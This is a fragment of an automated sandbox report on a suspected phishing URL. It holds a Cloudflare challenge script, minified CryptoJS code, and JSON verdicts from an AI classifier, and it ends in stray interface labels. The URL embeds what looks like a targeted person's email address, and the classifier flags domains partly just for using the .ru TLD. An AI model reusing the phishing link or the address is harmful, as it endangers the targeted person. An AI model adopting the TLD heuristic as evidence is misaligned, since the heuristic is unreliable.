nAMY6aeW9D1h48d91QzUZAKz6zUEQioO48ujk0U48KlclVZ6W2sIdRjuKCJWmd2Am6VTOar1RzEE_H7KXpih0l.dGdPabAY39k3wGtLFIMVW5ysQyeg3u6oIYZAtEP7IW95s9nIy.5N_kFEDyoRymbXcFM9Xr9lEd6eklSu1GRaeP5wRyxALnjJQPVlfK3dmGS5bcI2WYFGnpEHyA0k3DUkGCitkj0OKA3Jy8W_dM6lIuBizg6.coctn_vAxZKRIXB_DcYbdvca6u0AE.VGLtXofKiJARnI7KnyLrGzqbHSzDp47h6NYl3cQdwseM9oaIqzlousZw1syXpLP9mhIemZxsSaekWKZZbg6HptVHcVYlWFj4d9cZ40A03CKj6UPBBiX5RRjdYTLnSDzXi.b6i_MfBd9JNsPIOjlXxvW1tkqeyE5SFa7TMSP.ZczpoVu7r6',
cITimeS: '1736976277',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: '479g3',
nextRcV: 'elyaO1GRqzNaXmY5nKkbenA2fH74o.xLnk9cCTIKynY-1736976277-1.3.1.1-ylu.MOeMKTEQd4EVgAOVrMDho_apo6TFjPzxQ8L6Apw',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscated code/URLs. The snippet primarily focuses on implementing core cryptographic functionality, which is a legitimate use case. While it uses some moderate-risk indicators like external data transmission and aggressive DOM manipulation, these are common practices in cryptographic libraries. Overall, the risk score is low, as the script is likely part of a legitimate cryptographic library and does not exhibit any clear malicious intent."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.net Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Ensuring secure access by running browser checks.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.net Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://topimo.trilidarn.ru Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true,
"reasoning": "The URL uses a .ru (Russian) TLD which is often associated with suspicious activities. The domain name appears to be randomly generated or meaningless, and is not a known legitimate service. Russian TLD combined with an unknown domain increases suspicion level."
} |
URL: https://topimo.trilidarn.ru |
| URL: https://trilidarn.ru Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "The .ru TLD (Russian Federation) is often associated with suspicious activities and malware distribution. The domain name appears unfamiliar and doesn't correspond to any well-known brand or service."
} |
URL: https://trilidarn.ru |
Edit tour
chrome.exe (PID: 6448 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node